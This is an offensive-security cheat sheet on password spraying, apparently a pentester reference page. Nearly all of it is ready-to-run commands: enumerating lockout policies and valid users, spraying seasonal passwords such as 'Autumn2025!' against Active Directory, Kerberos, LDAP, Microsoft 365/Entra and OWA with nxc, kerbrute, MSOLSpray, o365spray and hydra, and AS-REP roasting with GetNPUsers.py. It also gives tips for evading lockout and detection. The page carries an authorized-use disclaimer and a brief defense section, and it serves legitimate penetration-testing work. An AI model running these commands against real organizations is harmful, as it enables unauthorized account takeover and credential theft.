PASSWORD-SPRAYING
Authorized use only. Offensive reference for systems you own or are explicitly permitted to test. You are responsible for staying within the law.
Low-and-slow authentication attacks: spray one password across many users to avoid lockouts. Authorized engagements only - lockouts and alerts have real impact.
SPRAY vs BRUTE FORCE#
Brute force : many passwords -> one account (locks accounts fast) Spraying : one password -> many accounts (evades lockout) Golden rule: stay UNDER the lockout threshold. Learn the policy first.
KNOW THE LOCKOUT POLICY#
On-prem AD (with creds or null session):
nxc smb TARGET -u '' -p '' --pass-pol
enum4linux -P TARGET
Get-ADDefaultDomainPasswordPolicy # PowerView / RSAT
Plan: attempts-per-window < threshold, then wait out the reset window
(e.g. 1 try / 30-60 min per account).
BUILD THE USER LIST#
# From OSINT (name format firstname.lastname etc.)
theHarvester -d target.com -b all
linkedin2username -> usernames
# Enumerate valid users where possible:
kerbrute userenum -d target.com --dc DC users.txt
nxc smb DC -u users.txt -p '' --continue-on-success # AS-REP / null
# o365 / Entra enumeration
o365spray --enum -d target.com
SEASONAL / POLICY-AWARE PASSWORD CANDIDATES#
<Season><Year>! Autumn2025! Winter2026!
<Company><Year>! Target2025!
<Month><Year> October2025
Password1 Welcome1 Changeme123! <City>123!
Match candidates to the observed complexity policy (length, classes).
ACTIVE DIRECTORY / SMB#
nxc smb DC -u users.txt -p 'Autumn2025!' --continue-on-success
kerbrute passwordspray -d target.com users.txt 'Autumn2025!' --dc DC
# LDAP (no failed-logon on some paths)
nxc ldap DC -u users.txt -p 'Autumn2025!'
KERBEROS (quieter than NTLM)#
kerbrute passwordspray -d target.com users.txt 'Winter2026!'
# AS-REP roast users without preauth (no password guessing at all)
GetNPUsers.py target.com/ -usersfile users.txt -no-pass -dc-ip DC
CLOUD: MICROSOFT 365 / ENTRA ID#
MSOLSpray --userlist users.txt --password 'Autumn2025!'
o365spray --spray -d target.com -U users.txt -p 'Autumn2025!'
# Watch for Smart Lockout, Conditional Access, MFA, and legacy-auth
# endpoints (Autodiscover/EWS/IMAP) that may bypass some controls.
OWA / EXCHANGE / VPN / WEB#
# Time login responses; valid users may respond differently.
# Tools: SprayingToolkit, atomizer, ffuf/hydra with 1 pw + throttle.
hydra -L users.txt -p 'Autumn2025!' TARGET https-post-form "..."
OPSEC & SAFETY#
- Track attempts per account; never cross the lockout line. - Randomize/slow timing; spread across the reset window. - Log everything for the report; coordinate with the blue team / POC. - One valid credential is the goal - stop and pivot, don't keep spraying.
DEFENSE NOTES (blue side)#
- MFA everywhere; disable legacy/basic auth. - Smart lockout, banned-password lists, anomaly detection. - Alert on many failed logons for one password across accounts (4625). See also: KERBRUTE, HYDRA, NETEXEC, CRACKMAPEXEC, HASHCAT, JOHN.